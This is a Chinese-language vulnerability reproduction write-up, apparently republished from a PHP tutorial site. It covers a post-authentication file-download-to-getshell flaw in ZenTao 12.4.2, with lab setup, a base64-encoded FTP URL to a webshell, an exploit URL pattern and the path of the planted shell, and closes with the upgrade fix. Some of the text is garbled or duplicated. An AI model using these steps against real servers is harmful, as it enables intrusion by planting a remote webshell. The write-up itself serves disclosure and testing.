禪道12.4.2後台管理員權限Getshell是怎麼樣的

0x00簡介

#禪道是一款專業的國產開源研發專案管理軟體，集產品管理、專案管理、品質管理、文件管理、組織管理和事務管理於一體，完整涵蓋了研發專案管理的核心流程。管理思想基於國際流行的敏捷專案管理方法——Scrum，在遵循其價值觀的基礎上，結合國內專案研發現狀，整合了任務管理、需求管理、Bug管理、用例管理等多種功能，覆蓋軟體從計劃到發布的整個生命週期。

0x01漏洞概述

禪12.4.2版本存在任意檔案下載漏洞，漏洞概述

禪12.4.2版本存在任意檔案下載漏洞，漏洞是因為client類別中download方法中過濾不嚴謹可以使用ftp達成下載文件的目的。且下載檔案儲存目錄可解析php文件，造成getshell。

0x02影響版本

禪≤ 12.4.2

0x03環境搭建

phpstudy2018   禪道12.4.2  禪道官方下載網址：

https://www.zentao.net/dynamic/zentaopms12.4.2-80263.html

3.1. 下載完成後，放入phpstudy中安裝即可

3.2. 檢查擴展，如果存在未通過的擴展，在phpstudy中開啟擴展即可。

3.3.設定資料庫信息，這裡設定成自己的資料庫配置。

3.4.設定帳號安裝完成

#3.4．利用環境搭建，開啟ftp服務，以windows2008R2為例，在新增角色，新增ftp

##3.5.然後在Internet資訊服務下的網站添加ftp服務。

3.6.依照自己的狀況配置，下一步可

3.7.在ftp目錄下放一個webshel​​l然後瀏覽器查看ftp是否可以正常存取

0x04漏洞複現

1.先把ftp加上shell的路徑進行base64編碼

加密前: ftp://192.168.3.200/shell.php

#加密後: ZnRwJTNBLy8xOTIuMTY4LjMuMjAwL3NoZWxsLnBocA==

2.使用EXP，把加密後的base64放入exp中的裡

http://127.0.0.1/zentaopms//index. /client-download-1--1.html

##3.使用以下連結路徑測試是否shell已下載至伺服器######http://192.168.3.200/zentaopms/www/data/client/1/shell.php################# #0x05修復方式#########1、升級到禪道12.4.3及之後的版本###

以上是禪道12.4.2後台管理員權限Getshell是怎麼樣的的詳細內容。更多資訊請關注PHP中文網其他相關文章！